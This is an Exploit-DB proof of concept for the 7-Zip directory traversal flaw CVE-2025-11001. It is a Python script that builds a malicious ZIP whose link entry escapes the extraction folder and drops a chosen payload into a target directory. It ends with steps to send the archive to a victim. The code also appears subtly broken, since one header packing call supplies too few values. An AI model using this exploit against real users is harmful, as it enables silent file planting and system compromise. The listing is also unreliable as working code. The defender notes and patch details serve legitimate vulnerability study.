7-Zip 24.00 - Directory Traversal

EDB-ID:

52501




Platform:

Multiple

Date:

2026-04-08


# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP 
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when a malicious archive is extracted by 7-Zip running as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later (7-Zip has no built-in auto-update, so each installed copy must be upgraded manually)
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions

import struct
import os
import argparse
import sys

def build_zip(target_path: str, payload_file: str, output_zip: str) -> None:
    """Write the proof-of-concept ZIP described in the header (CVE-2025-11001).

    The archive is laid out by hand with ``struct.pack`` rather than through
    ``zipfile``: two local entries (a link-style entry named ``evil.lnk`` and
    the payload file), two central-directory records and an
    end-of-central-directory record.

    Args:
        target_path: Directory the header text says the payload should land
            in. Backslashes are converted to ``/`` and the result is prefixed
            with four ``../`` components.
        payload_file: Path of an existing file whose bytes are stored
            uncompressed under its base name.
        output_zip: Path of the archive to create; an existing file is
            overwritten.

    Exits the process with status 1 when ``payload_file`` is not a regular
    file.

    Defender notes: the indicator this sample models is an archive entry whose
    link target leaves the extraction root (``..`` components or an absolute
    path). Extractors should resolve link targets against the destination
    directory and refuse anything outside it; the header lists 7-Zip 25.00 as
    the fixed release. Extracting untrusted archives from an unprivileged
    session limits where a stray write can land.

    NOTE(review): this listing is not verified here to produce a well-formed
    archive; do not rely on it as a regression sample for patch validation
    without checking its output first.
    """
    if not os.path.isfile(payload_file):
        print(f"[-] Payload file not found: {payload_file}")
        sys.exit(1)

    payload_name = os.path.basename(payload_file)
    # Whole payload is read into memory; the handle is left for the garbage
    # collector to close (no ``with`` block).
    payload_data = open(payload_file, "rb").read()

    # Normalise to forward slashes, drop leading/trailing separators, then
    # climb four directory levels before descending into the target.
    target = target_path.replace("\\", "/").strip("/") + "/"
    traversal = "../../../../" + target

    with open(output_zip, "wb") as f:
        # Running byte position, used for the offsets stored in the central
        # directory and the end-of-central-directory record.
        offset = 0

        symlink_name = "evil.lnk"
        # Link target is the traversal path, NUL-terminated, carried in an
        # extra-field record tagged 0x756e (ID, length, data).
        symlink_target = traversal.encode() + b"\x00"
        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target

        # 0x04034b50 is the ZIP local-file-header signature ("PK\x03\x04").
        symlink_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra))

        f.write(symlink_header)
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        # Zero-length write: the link entry has no file data.
        f.write(b"")
        symlink_central_offset = offset
        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)

        # Second local entry: the payload, with equal compressed and
        # uncompressed sizes (stored, not deflated).
        payload_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0)

        f.write(payload_header)
        f.write(payload_name.encode())
        f.write(payload_data)
        payload_central_offset = offset
        offset += len(payload_header) + len(payload_name) + len(payload_data)

        # Everything written from here on is the central directory.
        cd_offset = offset

        # 0x02014b50 is the central-directory record signature. "Version made
        # by" 0x0317 has host byte 3 (Unix), which is what makes an extractor
        # interpret the external-attributes field as Unix mode bits. 0xA1ED is
        # octal 120755: the Unix symlink file type plus permissions 0755.
        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
        f.write(symlink_name.encode())
        f.write(symlink_extra)

        # Central-directory record for the payload entry.
        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
        f.write(payload_name.encode())

        # 0x06054b50 is the end-of-central-directory signature; the record
        # declares two entries. ``offset`` was not advanced past the central
        # directory, so it still equals ``cd_offset`` here.
        f.write(struct.pack("<IHHHHIIH",
            0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))

    # Operator-facing summary printed by the original author.
    print(f"[+] Malicious archive created: {output_zip}")
    print(f"[+] Target path          : {target_path}")
    print(f"[+] Payload file         : {payload_name} ({len(payload_data)} bytes)")
    print(f"[+] Final write location : {target_path}\\{payload_name}")
    print("\n[*] Usage:")
    print("    1. Send the ZIP file to the victim")
    print("    2. Victim must run 7-Zip < 25.00 as Administrator")
    print("    3. Victim opens and extracts the ZIP → payload dropped silently")
    print("    4. Achievement unlocked")

if __name__ == "__main__":
    # Script entry point: show the identification banner, then read the
    # three command-line options and pass them to build_zip().
    print("""
    CVE-2025-11001 - 7-Zip Directory Traversal PoC
    Author: Mohammed Idrees Banyamer (@banyamer_security)
    """)

    cli = argparse.ArgumentParser(
        description="CVE-2025-11001 Exploit - 7-Zip < 25.00",
    )
    # Destination directory and payload path are mandatory.
    cli.add_argument(
        "-t", "--target",
        required=True,
        help="Target directory (e.g. C:\\Windows\\System32)",
    )
    cli.add_argument(
        "-p", "--payload",
        required=True,
        help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)",
    )
    # Output archive name falls back to a fixed default.
    cli.add_argument(
        "-o", "--output",
        default="CVE-2025-11001-exploit.zip",
        help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)",
    )

    opts = cli.parse_args()
    build_zip(opts.target, opts.payload, opts.output)